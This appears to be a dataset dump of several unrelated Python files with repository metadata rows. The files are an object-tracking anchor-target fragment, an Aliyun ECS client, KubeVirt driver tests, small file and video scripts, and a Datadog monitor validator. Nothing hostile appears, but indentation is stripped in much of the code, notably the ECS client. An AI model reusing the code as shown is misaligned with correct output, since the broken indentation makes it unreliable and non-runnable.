overlap = np.zeros((anchor_num, size, size), dtype=np.float32)
return cls, delta, delta_weight, overlap
        # all_anchors already contains every anchor for each feature-map location:
        # all_anchors[0] holds the corner form and all_anchors[1] the center form,
        # each of shape [4, anchor_num, size, size].
        anchor_box = self.anchors.all_anchors[0]
anchor_center = self.anchors.all_anchors[1]
x1, y1, x2, y2 = anchor_box[0], anchor_box[1], \
anchor_box[2], anchor_box[3]
cx, cy, w, h = anchor_center[0], anchor_center[1], \
anchor_center[2], anchor_center[3]
        # tcx/tcy/tw/th describe the target while cx/cy/w/h describe the anchors; the
        # location is encoded as offsets and log ratios relative to the anchors, which
        # makes the regression easier for the network to learn.
        delta[0] = (tcx - cx) / w
delta[1] = (tcy - cy) / h
delta[2] = np.log(tw / w)
delta[3] = np.log(th / h)
        overlap = IoU([x1, y1, x2, y2], target)  # IoU between this target and every anchor
        pos = np.where(overlap > cfg.TRAIN.THR_HIGH)  # IoU above the high threshold (0.6): positive
        neg = np.where(overlap < cfg.TRAIN.THR_LOW)  # IoU below the low threshold (0.3): negative
        pos, pos_num = select(pos, cfg.TRAIN.POS_NUM)
        neg, neg_num = select(neg, cfg.TRAIN.TOTAL_NUM - cfg.TRAIN.POS_NUM)
        cls[pos] = 1  # mark positive anchors
        # Weight positive anchors so the loss averages over them; other positions are ignored.
        delta_weight[pos] = 1. / (pos_num + 1e-6)
        cls[neg] = 0  # mark negative anchors; everything else keeps the initial value -1
return cls, delta, delta_weight, overlap
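# Illustrative sketch, not part of the original file: typical use inside a training
# dataset, assuming cfg has already been merged from a pysot experiment config and
# `bbox` is a hypothetical target box in search-region coordinates.
#
#   anchor_target = AnchorTarget()
#   cls, delta, delta_weight, overlap = anchor_target(
#       bbox, cfg.TRAIN.OUTPUT_SIZE, neg=False)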
| 42.656566
| 161
| 0.574473
|
8b28789975fb65cdc4570c39689b414b8731db83
| 11,644
|
py
|
Python
|
pymlsql/aliyun/ecs_builder.py
|
allwefantasy/PyMLSQL
|
9d7a6aa2df42fd7a384885f1423c34ae5baff925
|
[
"Apache-2.0"
] | null | null | null |
pymlsql/aliyun/ecs_builder.py
|
allwefantasy/PyMLSQL
|
9d7a6aa2df42fd7a384885f1423c34ae5baff925
|
[
"Apache-2.0"
] | null | null | null |
pymlsql/aliyun/ecs_builder.py
|
allwefantasy/PyMLSQL
|
9d7a6aa2df42fd7a384885f1423c34ae5baff925
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
import os
import json
import logging
import time
import pymlsql.aliyun.shellutils as shellutils
from aliyunsdkcore.client import AcsClient
from aliyunsdkecs.request.v20140526.AllocatePublicIpAddressRequest import AllocatePublicIpAddressRequest
from aliyunsdkecs.request.v20140526.CreateInstanceRequest import CreateInstanceRequest
from aliyunsdkecs.request.v20140526.DeleteInstanceRequest import DeleteInstanceRequest
from aliyunsdkecs.request.v20140526.DescribeInstancesRequest import DescribeInstancesRequest
from aliyunsdkecs.request.v20140526.CreateKeyPairRequest import CreateKeyPairRequest
from aliyunsdkecs.request.v20140526.DeleteKeyPairsRequest import DeleteKeyPairsRequest
from aliyunsdkecs.request.v20140526.StartInstanceRequest import StartInstanceRequest
from aliyunsdkecs.request.v20140526.StopInstanceRequest import StopInstanceRequest
ALIYUN_AK = "AK"
ALIYUN_AKS = "AKS"
ALIYUN_REGION = "cn-hangzhou"
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger("ECSClient")
ECS_STATUS_PENDING = "Pending"
ECS_STATUS_RUNNING = "Running"
ECS_STATUS_STOPPED = "Stopped"
ECS_STATUS_STARTING = "Starting"
ECS_STATUS_STOPPING = "Stopping"
class ECSClientBuilder(object):
def __init__(self):
self.request = CreateInstanceRequest()
self.keyPairName = None
def instance_type(self, value):
self.request.set_InstanceType(value)
return self
def image_id(self, value):
self.request.set_ImageId(value)
return self
def security_group(self, value):
self.request.set_SecurityGroupId(value)
return self
def key_pair_name(self, value):
self.request.set_KeyPairName(value)
self.keyPairName = value
return self
def internet_max_bandwidth_out(self, value):
self.request.set_InternetMaxBandwidthOut(value)
return self
def build(self):
if not self.keyPairName:
raise ValueError("key_pair_name should be set")
client = ECSClient(self.keyPairName, create_instance_request=self.request)
return client
class ECSClient(object):
def __init__(self, keyPairName, create_instance_request=None):
if not ECSClient.env(ALIYUN_AK) or not ECSClient.env(ALIYUN_AKS):
raise ValueError("AK or AKS should be configured by environment")
self.client = AcsClient(
ECSClient.env(ALIYUN_AK),
ECSClient.env(ALIYUN_AKS),
ALIYUN_REGION
)
self.create_instance_request = create_instance_request
self.keyPairName = keyPairName
@staticmethod
def env(name):
        # .get so that a missing variable trips the explicit check in __init__
        # instead of raising a bare KeyError here.
        return os.environ.get(name)
@staticmethod
def home():
# return shellutils.run_cmd(["eval", "echo", "~$USER"], True)
from os.path import expanduser
return expanduser("~")
# return "/Users/allwefantasy"
# from pathlib import Path
# return str(Path.home())
# We should create sshkey first then create instance
def create_sshkey(self, save_path):
request = CreateKeyPairRequest()
request.set_KeyPairName(self.keyPairName)
response = self.execute(request)
# write private key to ./ssh directory
with open(save_path + "/" + self.keyPairName, "w") as f:
f.write(response['PrivateKeyBody'])
# append fingerprint to known_hosts
# with open(save_path + "/tmp_knowhost_" + self.keyPairName, "w") as f:
# f.write(response['KeyPairFingerPrint'])
return response
# We should create sshkey first then create instance
def add_finterprint(self, save_path, ip):
pass
# with open(save_path + "/tmp_knowhost_" + self.keyPairName, 'r') as f:
# content = "\n".join(f.readlines())
# with open(save_path + "/known_hosts", "a") as f:
# f.write(ip + " ecdsa-sha2-nistp256 " + content)
def delete_sshkey(self):
request = DeleteKeyPairsRequest()
request.set_KeyPairNames([self.keyPairName])
response = self.execute(request)
return response
def create_after_pay_instance(self, internet_max_bandwidth_out=1, image_id="m-bp19ibpdra8vdltxftbc",
instance_type="ecs.ic5.large"):
if self.create_instance_request:
logger.info("using create request from Builder")
request = self.create_instance_request
else:
request = CreateInstanceRequest()
request.set_ImageId(image_id)
request.set_InstanceType(instance_type)
request.set_IoOptimized('optimized')
request.set_SystemDiskCategory('cloud_ssd')
request.set_KeyPairName(self.keyPairName)
if internet_max_bandwidth_out > 0:
request.set_InternetMaxBandwidthOut(internet_max_bandwidth_out)
response = self.execute(request)
logger.info(response)
instance_id = response.get('InstanceId')
logger.info("instance %s created task submit successfully.", instance_id)
return instance_id
def allocate_public_address(self, instance_id):
status = self.get_instance_status_by_id(instance_id)
if status != ECS_STATUS_STOPPED and status != ECS_STATUS_RUNNING:
logger.warning("instance [%s] is not in [%s],current status [%s], cannot allocate_public_address",
instance_id,
",".join([ECS_STATUS_STOPPED, ECS_STATUS_RUNNING]), status)
return None
request = AllocatePublicIpAddressRequest()
request.set_InstanceId(instance_id)
response = self.execute(request)
logger.info("allocate address [%s] for [%s],", response["IpAddress"], instance_id)
return response["IpAddress"]
def get_instance_detail_by_id(self, instance_id):
request = DescribeInstancesRequest()
request.set_InstanceIds(json.dumps([instance_id]))
response = self.execute(request)
return response.get('Instances').get('Instance')
def get_instance_status_by_id(self, instance_id):
return self.get_instance_detail_by_id(instance_id)[0]["Status"]
def check_instance_exists_by_id(self, instance_id):
return len(self.get_instance_detail_by_id(instance_id)) > 0
def start_instance(self, instance_id):
status = self.get_instance_status_by_id(instance_id)
if status != ECS_STATUS_STOPPED:
logger.warning("instance [%s] is not in [%s],current status [%s], cannot start it", instance_id,
",".join([ECS_STATUS_STOPPED]), status)
return None
request = StartInstanceRequest()
request.set_InstanceId(instance_id)
response = self.execute(request)
return response
def stop_instance(self, instance_id):
status = self.get_instance_status_by_id(instance_id)
if status != ECS_STATUS_RUNNING:
logger.warning("instance [%s] is not in [%s],current status [%s], cannot stop it", instance_id,
",".join([ECS_STATUS_RUNNING]), status)
return None
request = StopInstanceRequest()
request.set_InstanceId(instance_id)
response = self.execute(request)
return response
def delete_instance(self, instance_id, retry=True):
status = self.get_instance_status_by_id(instance_id)
if status != ECS_STATUS_STOPPED:
logger.error("instance [%s] is not in [%s],current status [%s], cannot delete it", instance_id,
",".join([ECS_STATUS_STOPPED]), status)
return None
        # Sometimes, even when it's already ECS_STATUS_STOPPED, we still cannot delete it.
# just sleep 10 seconds
# we can also retry several times
time.sleep(10)
try_times = 5
while try_times > 0:
try:
if not retry:
try_times = 0
request = DeleteInstanceRequest()
request.set_InstanceId(instance_id)
request.set_Force(True)
response = self.execute(request)
logger.info("successfully delete instance [%s]", instance_id)
return response
except Exception as e:
try_times -= 1
time.sleep(5)
logger.exception("cannot delete instance [%s],retry", instance_id)
@staticmethod
def pretty_json(item):
return json.dumps(json.loads(item.decode("utf-8")), indent=4, separators=(',', ': '))
def show_instances(self):
        request = DescribeInstancesRequest()
request.set_PageSize(10)
response = self.client.do_action_with_exception(request)
return ECSClient.pretty_json(response)
def wait_to_stopped_from_pending(self, instance_id, timeout=10):
instances = self.get_instance_detail_by_id(instance_id=instance_id)
if len(instances) == 0:
raise ValueError("no instance was found")
status = instances[0]["Status"]
time_v = 0
while status != ECS_STATUS_STOPPED and time_v < timeout:
time.sleep(5)
time_v += 5
logger.info("[pending -> stopped] [current status: %s]", status)
status = self.get_instance_detail_by_id(instance_id=instance_id)[0]["Status"]
if time_v >= timeout and status != ECS_STATUS_STOPPED:
logger.error("fail to wait to be [%s]; current status: [%s]; time_v: [%s]", ECS_STATUS_STOPPED, status,
str(time_v))
return status
def wait_to_running_from_starting(self, instance_id, timeout=10):
instances = self.get_instance_detail_by_id(instance_id=instance_id)
if len(instances) == 0:
raise ValueError("no instance was found")
status = instances[0]["Status"]
logger.info("[pending -> stopped] [current status: %s]", status)
time_v = 0
while status != ECS_STATUS_RUNNING and time_v < timeout:
time.sleep(5)
time_v += 5
logger.info("[starting -> running] [current status: %s]", status)
status = self.get_instance_detail_by_id(instance_id=instance_id)[0]["Status"]
if time_v >= timeout and status != ECS_STATUS_RUNNING:
logger.info("fail to wait to be [%s]; current status: [%s]; time_v: [%s]", ECS_STATUS_RUNNING, status,
str(time_v))
return status
def wait_to_stopped_from_running(self, instance_id, timeout=10):
instances = self.get_instance_detail_by_id(instance_id=instance_id)
if len(instances) == 0:
raise ValueError("no instance was found")
status = instances[0]["Status"]
time_v = 0
while status != ECS_STATUS_STOPPED and time_v < timeout:
time.sleep(5)
time_v += 5
logger.info("[running -> stopped] [current status: %s]", status)
status = self.get_instance_detail_by_id(instance_id=instance_id)[0]["Status"]
if time_v >= timeout and status != ECS_STATUS_STOPPED:
logger.info("fail to wait to be [%s]; current status: [%s]; time_v: [%s]", ECS_STATUS_STOPPED, status,
str(time_v))
if time_v < timeout and status == ECS_STATUS_STOPPED:
logger.info("wait_to_stopped_from_running success: [%s]", status)
return status
def execute(self, request):
response = self.client.do_action_with_exception(request)
return json.loads(response.decode("utf-8"))
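# Illustrative sketch, not part of the original module: the intended builder flow.
# The image and security-group IDs below are placeholders, ALIYUN AK/AKS must be
# exported in the environment, and these calls create and bill real resources.
#
#   client = (ECSClientBuilder()
#             .image_id('m-xxxxxxxxxxxx')
#             .instance_type('ecs.ic5.large')
#             .security_group('sg-xxxxxxxxxxxx')
#             .internet_max_bandwidth_out(1)
#             .key_pair_name('mlsql-key')
#             .build())
#   instance_id = client.create_after_pay_instance()
#   client.wait_to_stopped_from_pending(instance_id, timeout=60)
#   client.start_instance(instance_id)
#   ip = client.allocate_public_address(instance_id)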
| 42.188406
| 115
| 0.654844
|
3ab5717eb9a9a1e04548160e636139e51ae35eeb
| 371
|
py
|
Python
|
04-python-academy-files-lab/print_comments.py
|
iproduct/intro-python
|
8fcf682286dad3fc65f46ccff33aefab9c601306
|
[
"Apache-2.0"
] | 3
|
2022-01-10T07:56:37.000Z
|
2022-02-14T16:37:56.000Z
|
04-python-academy-files-lab/print_comments.py
|
iproduct/intro-python
|
8fcf682286dad3fc65f46ccff33aefab9c601306
|
[
"Apache-2.0"
] | null | null | null |
04-python-academy-files-lab/print_comments.py
|
iproduct/intro-python
|
8fcf682286dad3fc65f46ccff33aefab9c601306
|
[
"Apache-2.0"
] | 1
|
2022-02-14T16:36:46.000Z
|
2022-02-14T16:36:46.000Z
|
import sys
if __name__ == "__main__":
if len(sys.argv) > 1:
filename = sys.argv[1]
else:
filename = __file__
print(f"Opening: {filename}")
with open(filename, encoding="utf-8") as f:
for i, line in enumerate(f):
pos = line.find("#")
if pos >= 0:
print(f"{i:3d}: {line[pos + 1: ].strip()}")
| 26.5
| 59
| 0.504043
|
c0661af07b482dc3e4eea84108916c9daad84a3e
| 8,365
|
py
|
Python
|
libcloud/test/compute/test_kubevirt.py
|
gig-tech/libcloud
|
3c7f83f64ee72252a14ddc1e1f8cac4474a0be4b
|
[
"Apache-2.0"
] | null | null | null |
libcloud/test/compute/test_kubevirt.py
|
gig-tech/libcloud
|
3c7f83f64ee72252a14ddc1e1f8cac4474a0be4b
|
[
"Apache-2.0"
] | null | null | null |
libcloud/test/compute/test_kubevirt.py
|
gig-tech/libcloud
|
3c7f83f64ee72252a14ddc1e1f8cac4474a0be4b
|
[
"Apache-2.0"
] | null | null | null |
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
from libcloud.compute.drivers.kubevirt import KubeVirtNodeDriver
from libcloud.compute.types import NodeState
from libcloud.utils.py3 import httplib
from libcloud.test import unittest
from libcloud.test import MockHttp
from libcloud.test.common.test_kubernetes import KubernetesAuthTestCaseMixin
from libcloud.test.file_fixtures import ComputeFileFixtures
class KubeVirtTestCase(unittest.TestCase, KubernetesAuthTestCaseMixin):
driver_cls = KubeVirtNodeDriver
fixtures = ComputeFileFixtures('kubevirt')
def setUp(self):
KubeVirtNodeDriver.connectionCls.conn_class = KubeVirtMockHttp
self.driver = KubeVirtNodeDriver(key='user',
secret='pass',
secure=True,
host='foo',
port=6443)
def test_list_locations(self):
locations = self.driver.list_locations()
self.assertEqual(len(locations), 5)
self.assertEqual(locations[0].name, 'default')
self.assertEqual(locations[1].name, 'kube-node-lease')
self.assertEqual(locations[2].name, 'kube-public')
self.assertEqual(locations[3].name, 'kube-system')
namespace4 = locations[0].driver.list_locations()[4].name
self.assertEqual(namespace4, 'kubevirt')
id4 = locations[2].driver.list_locations()[4].id
self.assertEqual(id4, 'e6d3d7e8-0ee5-428b-8e17-5187779e5627')
def test_list_nodes(self):
nodes = self.driver.list_nodes()
id0 = "74fd7665-fbd6-4565-977c-96bd21fb785a"
self.assertEqual(len(nodes), 1)
self.assertEqual(nodes[0].extra['namespace'], 'default')
valid_node_states = {NodeState.RUNNING, NodeState.PENDING, NodeState.STOPPED}
self.assertTrue(nodes[0].state in valid_node_states)
self.assertEqual(nodes[0].name, 'testvm')
self.assertEqual(nodes[0].id, id0)
def test_destroy_node(self):
nodes = self.driver.list_nodes()
to_destroy = nodes[-1]
resp = self.driver.destroy_node(to_destroy)
self.assertTrue(resp)
def test_start_node(self):
nodes = self.driver.list_nodes()
r1 = self.driver.start_node(nodes[0])
self.assertTrue(r1)
def test_stop_node(self):
nodes = self.driver.list_nodes()
r1 = self.driver.stop_node(nodes[0])
self.assertTrue(r1)
def test_reboot_node(self):
nodes = self.driver.list_nodes()
for node in nodes:
if node.name == "testvm":
resp = self.driver.reboot_node(node)
self.assertTrue(resp)
class KubeVirtMockHttp(MockHttp):
fixtures = ComputeFileFixtures('kubevirt')
def _api_v1_namespaces(self, method, url, body, headers):
if method == "GET":
body = self.fixtures.load('_api_v1_namespaces.json')
else:
raise AssertionError('Unsupported method')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _apis_kubevirt_io_v1alpha3_namespaces_default_virtualmachines(self,
method, url, body, headers):
if method == "GET":
body = self.fixtures.load('get_default_vms.json')
resp = httplib.OK
elif method == "POST":
body = self.fixtures.load('create_vm.json')
resp = httplib.CREATED
else:
            raise AssertionError('Unsupported method')
return (resp, body, {}, httplib.responses[httplib.OK])
def _apis_kubevirt_io_v1alpha3_namespaces_kube_node_lease_virtualmachines(self,
method, url, body, headers):
if method == "GET":
body = self.fixtures.load('get_kube_node_lease_vms.json')
elif method == "POST":
pass
else:
            raise AssertionError('Unsupported method')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _apis_kubevirt_io_v1alpha3_namespaces_kube_public_virtualmachines(self,
method, url, body, headers):
if method == "GET":
body = self.fixtures.load('get_kube_public_vms.json')
elif method == "POST":
pass
else:
            raise AssertionError('Unsupported method')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _apis_kubevirt_io_v1alpha3_namespaces_kube_system_virtualmachines(self,
method, url, body, headers):
if method == "GET":
body = self.fixtures.load('get_kube_system_vms.json')
elif method == "POST":
pass
else:
            raise AssertionError('Unsupported method')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _apis_kubevirt_io_v1alpha3_namespaces_kubevirt_virtualmachines(self,
method, url, body, headers):
if method == "GET":
body = self.fixtures.load('get_kube_public_vms.json')
elif method == "POST":
pass
else:
            raise AssertionError('Unsupported method')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _apis_kubevirt_io_v1alpha3_namespaces_default_virtualmachines_testvm(self,
method, url, body, headers):
header = "application/merge-patch+json"
data_stop = {"spec": {"running": False}}
data_start = {"spec": {"running": True}}
if method == "PATCH" and headers['Content-Type'] == header and body == data_start:
body = self.fixtures.load('start_testvm.json')
elif method == "PATCH" and headers['Content-Type'] == header and body == data_stop:
body = self.fixtures.load('stop_testvm.json')
else:
            raise AssertionError('Unsupported method')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _apis_kubevirt_io_v1alpha3_namespaces_default_virtualmachines_vm_cirros(self,
method, url, body, headers):
header = "application/merge-patch+json"
data_stop = {"spec": {"running": False}}
data_start = {"spec": {"running": True}}
if method == "PATCH" and headers['Content-Type'] == header and body == data_start:
body = self.fixtures.load('start_vm_cirros.json')
elif method == "PATCH" and headers['Content-Type'] == header and body == data_stop:
body = self.fixtures.load('stop_vm_cirros.json')
else:
            raise AssertionError('Unsupported method')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _apis_kubevirt_io_v1alpha3_namespaces_default_virtualmachineinstances_testvm(self,
method, url, body, headers):
if method == "DELETE":
body = self.fixtures.load('delete_vmi_testvm.json')
else:
            raise AssertionError('Unsupported method')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _api_v1_namespaces_default_pods(self, method, url, body, headers):
if method == "GET":
body = self.fixtures.load('get_pods.json')
else:
            raise AssertionError('Unsupported method')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
if __name__ == '__main__':
sys.exit(unittest.main())
| 39.833333
| 91
| 0.621518
|
364ee95a08a5727972b3d415785ca55545423e8e
| 776
|
py
|
Python
|
File_Handling/04E_directory_traversal/directory_traversal.py
|
MihailMarkovski/Python-Advanced-2020
|
8edea78cbe5588a409ba9bc3767861250f58c1a6
|
[
"MIT"
] | 4
|
2020-09-19T13:53:19.000Z
|
2020-11-01T18:34:53.000Z
|
File_Handling/04E_directory_traversal/directory_traversal.py
|
MNikov/Python-Advanced-September-2020
|
1d65039de7f094d908411afffa8aee9689ab4220
|
[
"MIT"
] | null | null | null |
File_Handling/04E_directory_traversal/directory_traversal.py
|
MNikov/Python-Advanced-September-2020
|
1d65039de7f094d908411afffa8aee9689ab4220
|
[
"MIT"
] | null | null | null |
import os
path = input()
files_dict = {}
sep_count = path.count(os.path.sep)
for root, directories, files in os.walk(path):
    if root.count(os.path.sep) - sep_count > 1:  # skip anything nested more than one level below the given path
continue
for file in files:
file_extension = file.split('.')[-1]
if file_extension not in files_dict:
files_dict[file_extension] = []
files_dict[file_extension].append(file)
result_string = ''
for ext, files in sorted(files_dict.items()):
result_string += f'.{ext}\n'
for file in sorted(files):
result_string += f'- - - {file}\n'
desktop = os.path.join(os.path.join(os.environ['USERPROFILE']), 'Desktop')
final_path = desktop + os.path.sep + 'report.txt'
with open(final_path, 'w') as report_file:
report_file.write(result_string)
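# Illustrative sketch, not part of the original solution: for files a.txt, b.txt and
# c.py found under the given path, report.txt would look roughly like
#
#   .py
#   - - - c.py
#   .txt
#   - - - a.txt
#   - - - b.txt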
| 28.740741
| 74
| 0.654639
|
6cb9aba7086463c56cb5b03a0a57035603977eff
| 2,416
|
py
|
Python
|
src/unicon/plugins/tests/test_plugin_dell.py
|
TestingBytes/unicon.plugins
|
0600956d805deb4fd790aa3ef591c5d659e85de1
|
[
"Apache-2.0"
] | 18
|
2019-11-23T23:14:53.000Z
|
2022-01-10T01:17:08.000Z
|
src/unicon/plugins/tests/test_plugin_dell.py
|
TestingBytes/unicon.plugins
|
0600956d805deb4fd790aa3ef591c5d659e85de1
|
[
"Apache-2.0"
] | 12
|
2020-11-09T20:39:25.000Z
|
2022-03-22T12:46:59.000Z
|
src/unicon/plugins/tests/test_plugin_dell.py
|
TestingBytes/unicon.plugins
|
0600956d805deb4fd790aa3ef591c5d659e85de1
|
[
"Apache-2.0"
] | 32
|
2020-02-12T15:42:22.000Z
|
2022-03-15T16:42:10.000Z
|
import os
import yaml
import unittest
from unittest.mock import patch
import unicon
from unicon import Connection
from unicon.eal.dialogs import Dialog
from unicon.mock.mock_device import mockdata_path
with open(os.path.join(mockdata_path, 'dell/dell_mock_data.yaml'), 'rb') as datafile:
mock_data = yaml.safe_load(datafile.read())
class TestDellPluginConnect(unittest.TestCase):
def test_login_connect(self):
c = Connection(hostname='DellOS6',
start=['mock_device_cli --os dell --state exec'],
os='dell',
username='knox',
tacacs_password='dell1111')
c.connect()
self.assertIn('DellOS6#', c.spawn.match.match_output)
c.disconnect()
def test_login_connect_ssh(self):
c = Connection(hostname='DellOS6',
start=['mock_device_cli --os dell --state connect_ssh'],
os='dell',
username='knox',
tacacs_password='dell1111')
c.connect()
self.assertIn('DellOS6#', c.spawn.match.match_output)
c.disconnect()
def test_login_connect_connectReply(self):
c = Connection(hostname='DellOS6',
start=['mock_device_cli --os dell --state exec'],
os='dell',
username='knox',
tacacs_password='dell1111',
connect_reply = Dialog([[r'^(.*?)Password:']]))
c.connect()
self.assertIn("^(.*?)Password:", str(c.connection_provider.get_connection_dialog()))
c.disconnect()
class TestDellPluginExecute(unittest.TestCase):
def test_execute_show_feature(self):
c = Connection(hostname='DellOS6',
start=['mock_device_cli --os dell --state exec'],
os='dell',
username='knox',
tacacs_password='dell1111',
init_exec_commands=[],
init_config_commands=[]
)
c.connect()
cmd = 'show ip interface'
expected_response = mock_data['exec']['commands'][cmd].strip()
ret = c.execute(cmd).replace('\r', '')
self.assertIn(expected_response, ret)
c.disconnect()
if __name__ == "__main__":
unittest.main()
| 35.529412
| 92
| 0.551738
|
b1e797b82686086d119ec6f5c1ab9f63aff1431f
| 285
|
py
|
Python
|
membership_program/config/desktop.py
|
techlift-tech/membership_program
|
265a84345c26670f037beb7363b05acb3f9586f2
|
[
"MIT"
] | null | null | null |
membership_program/config/desktop.py
|
techlift-tech/membership_program
|
265a84345c26670f037beb7363b05acb3f9586f2
|
[
"MIT"
] | null | null | null |
membership_program/config/desktop.py
|
techlift-tech/membership_program
|
265a84345c26670f037beb7363b05acb3f9586f2
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from frappe import _
def get_data():
return [
{
"module_name": "Membership Program",
"color": "grey",
"icon": "octicon octicon-file-directory",
"type": "module",
"label": _("Membership Program")
}
]
| 19
| 44
| 0.635088
|
a8ce2f47da5f0795abf6a620d1e35df9debf97bc
| 581
|
py
|
Python
|
make_video.py
|
jrkwon/CarND-Semantic-Segmentation
|
a17d79b1b73062430ea15fdd5c1e33d12e5b4592
|
[
"MIT"
] | 1
|
2020-07-07T00:24:34.000Z
|
2020-07-07T00:24:34.000Z
|
make_video.py
|
jrkwon/CarND-Semantic-Segmentation
|
a17d79b1b73062430ea15fdd5c1e33d12e5b4592
|
[
"MIT"
] | null | null | null |
make_video.py
|
jrkwon/CarND-Semantic-Segmentation
|
a17d79b1b73062430ea15fdd5c1e33d12e5b4592
|
[
"MIT"
] | null | null | null |
import cv2
import os
import sys
if len(sys.argv) == 1:
print('Need runs_id')
sys.exit()
runs_id = sys.argv[1] #'1545192834.8808994'
image_folder = 'runs/' + runs_id
video_name = 'video-'+runs_id+'.avi'
images = [img for img in sorted(os.listdir(image_folder)) if img.endswith(".png")]
frame = cv2.imread(os.path.join(image_folder, images[0]))
height, width, layers = frame.shape
video = cv2.VideoWriter(video_name, cv2.VideoWriter_fourcc(*'XVID'), 1, (width,height))
for image in images:
video.write(cv2.imread(os.path.join(image_folder, image)))
video.release()
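# Illustrative usage, not part of the original script:
#
#   python make_video.py 1545192834.8808994
#
# reads the PNG frames from runs/1545192834.8808994 and writes
# video-1545192834.8808994.avi at 1 fps.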
| 25.26087
| 87
| 0.709122
|
c5967f40310eb8ca249fe2b8f6338c134e3236d4
| 5,412
|
py
|
Python
|
datadog_checks_dev/datadog_checks/dev/tooling/commands/validate/recommended_monitors.py
|
ypisetsky/integrations-core
|
f7153d3f896827c3325c7f0ec088bc17d088a894
|
[
"BSD-3-Clause"
] | 1
|
2021-06-06T23:49:17.000Z
|
2021-06-06T23:49:17.000Z
|
datadog_checks_dev/datadog_checks/dev/tooling/commands/validate/recommended_monitors.py
|
ypisetsky/integrations-core
|
f7153d3f896827c3325c7f0ec088bc17d088a894
|
[
"BSD-3-Clause"
] | null | null | null |
datadog_checks_dev/datadog_checks/dev/tooling/commands/validate/recommended_monitors.py
|
ypisetsky/integrations-core
|
f7153d3f896827c3325c7f0ec088bc17d088a894
|
[
"BSD-3-Clause"
] | null | null | null |
# (C) Datadog, Inc. 2020-present
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
import json
import os
import click
from ....utils import read_file
from ...testing import process_checks_option
from ...utils import complete_valid_checks, get_assets_from_manifest, load_manifest
from ..console import CONTEXT_SETTINGS, abort, echo_failure, echo_info, echo_success
REQUIRED_ATTRIBUTES = {'name', 'type', 'query', 'message', 'tags', 'options', 'recommended_monitor_metadata'}
EXTRA_NOT_ALLOWED_FIELDS = ['id']
ALLOWED_MONITOR_TYPES = ['query alert', 'event alert', 'service check']
@click.command(
'recommended-monitors',
context_settings=CONTEXT_SETTINGS,
short_help='Validate recommended monitor definition JSON files',
)
@click.argument('check', autocompletion=complete_valid_checks, required=False)
def recommended_monitors(check):
"""Validate all recommended monitors definition files.
If `check` is specified, only the check will be validated, if check value is 'changed' will only apply to changed
checks, an 'all' or empty `check` value will validate all README files.
"""
checks = process_checks_option(check, source='integrations')
echo_info(f"Validating recommended monitors for {len(checks)} checks ...")
failed_checks = 0
ok_checks = 0
for check_name in checks:
display_queue = []
file_failed = False
manifest = load_manifest(check_name)
monitors_relative_locations, invalid_files = get_assets_from_manifest(check_name, 'monitors')
for file in invalid_files:
echo_info(f'{check_name}... ', nl=False)
echo_info(' FAILED')
echo_failure(f' {file} does not exist')
failed_checks += 1
for monitor_file in monitors_relative_locations:
monitor_filename = os.path.basename(monitor_file)
try:
decoded = json.loads(read_file(monitor_file).strip())
except json.JSONDecodeError as e:
failed_checks += 1
echo_info(f'{check_name}... ', nl=False)
echo_failure(' FAILED')
echo_failure(f' invalid json: {e}')
continue
all_keys = set(decoded.keys())
if not REQUIRED_ATTRIBUTES.issubset(all_keys):
missing_fields = REQUIRED_ATTRIBUTES.difference(all_keys)
file_failed = True
display_queue.append(
(echo_failure, f" {monitor_filename} does not contain the required fields: {missing_fields}"),
)
elif any([item for item in all_keys if item in EXTRA_NOT_ALLOWED_FIELDS]):
file_failed = True
display_queue.append(
(
echo_failure,
f" {monitor_filename} contains unsupported field(s). Please ensure none of the following are"
f" in the file: {EXTRA_NOT_ALLOWED_FIELDS}",
),
)
else:
# If all required keys exist, validate values
monitor_type = decoded.get('type')
if monitor_type not in ALLOWED_MONITOR_TYPES:
file_failed = True
display_queue.append(
(
echo_failure,
f" {monitor_filename} is of unsupported type: \"{monitor_type}\". Only"
f" the following types are allowed: {ALLOWED_MONITOR_TYPES}",
)
)
description = decoded.get('recommended_monitor_metadata').get('description')
if description is not None:
if len(description) > 300:
file_failed = True
display_queue.append(
(
echo_failure,
f" {monitor_filename} has a description field that is too long, must be < 300 chars",
),
)
result = [i for i in decoded.get('tags') if i.startswith('integration:')]
if len(result) < 1:
file_failed = True
display_queue.append((echo_failure, f" {monitor_filename} must have an `integration` tag"))
display_name = manifest.get("display_name").lower()
monitor_name = decoded.get('name').lower()
if not (check_name in monitor_name or display_name in monitor_name):
file_failed = True
display_queue.append(
(echo_failure, f" {monitor_filename} name must contain the integration name"),
)
if file_failed:
failed_checks += 1
# Display detailed info if file is invalid
echo_info(f'{check_name}... ', nl=False)
echo_failure(' FAILED')
for display_func, message in display_queue:
display_func(message)
display_queue = []
else:
ok_checks += 1
if ok_checks:
echo_success(f"{ok_checks} valid files")
if failed_checks:
echo_failure(f"{failed_checks} invalid files")
abort()
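# Illustrative sketch, not part of the original module: a minimal monitor definition
# that would pass these checks for a hypothetical "foo" integration (field names come
# from REQUIRED_ATTRIBUTES / ALLOWED_MONITOR_TYPES above; all values are made up).
#
#   {
#       "name": "[Foo] High error rate",
#       "type": "query alert",
#       "query": "avg(last_5m):avg:foo.errors{*} > 10",
#       "message": "Foo is reporting an elevated error rate.",
#       "tags": ["integration:foo"],
#       "options": {"thresholds": {"critical": 10}},
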